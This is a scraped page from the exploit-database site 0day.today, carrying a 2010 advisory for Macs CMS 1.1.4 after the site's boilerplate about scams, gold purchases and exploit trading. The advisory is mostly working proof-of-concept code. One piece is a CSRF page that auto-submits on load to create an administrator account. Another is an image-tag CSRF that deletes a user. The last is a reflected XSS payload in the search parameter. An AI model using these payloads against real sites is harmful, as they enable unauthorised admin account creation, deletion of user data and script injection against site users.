0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Macs CMS 1.1.4 (XSS/CSRF) Vulnerabilities
========================================= Macs CMS 1.1.4 (XSS/CSRF) Vulnerabilities ========================================= <!--- Title: Macs CMS 1.1.4 Multiple Vulnerabilities (XSS/CSRF) Author: 10n1z3d <10n1z3d[at]w[dot]cn> Date: Sun 11 Jul 2010 11:53:35 AM EEST Vendor: http://macs-framework.sourceforge.net/ Download: http://sourceforge.net/projects/macs-framework/ ---> -=[ CSRF PoC 1 - Create Admin User ]=- <html> <head> <title>Macs CMS 1.1.4 Multiple Vulnerabilities (XSS/CSRF) - Create Admin User</title> </head> <body onload="document.csrf.submit();"> <!--- Edit these ---> <form name="csrf" action="http://[domain]/index.php/main/cms/saveUser" method="post"> <input type="hidden" name="ajaxRequest" value="true" /> <input type="hidden" name="username" value="root" /> <input type="hidden" name="password" value="rootroot"/> <input type="hidden" name="confirmPassword" value="rootroot" /> <input type="hidden" name="emailAddress" value="root@root.com" /> <!--- Do not edit below ---> <input type="hidden" name="roleId" value="1" /> </form> </body> </html> -=[ CSRF PoC 2 - Delete User ]=- <img src='http://[domain]/index.php/main/cms/deleteUser?userId=2' /> -=[ XSS PoC ]=- http://[domain]/index.php/footer/search?searchString='><script>alert('xss')</script> <!--- http://www.evilzone.org/ irc.evilzone.org (6697 / 9999) ---> # 0day.today [2024-11-15] #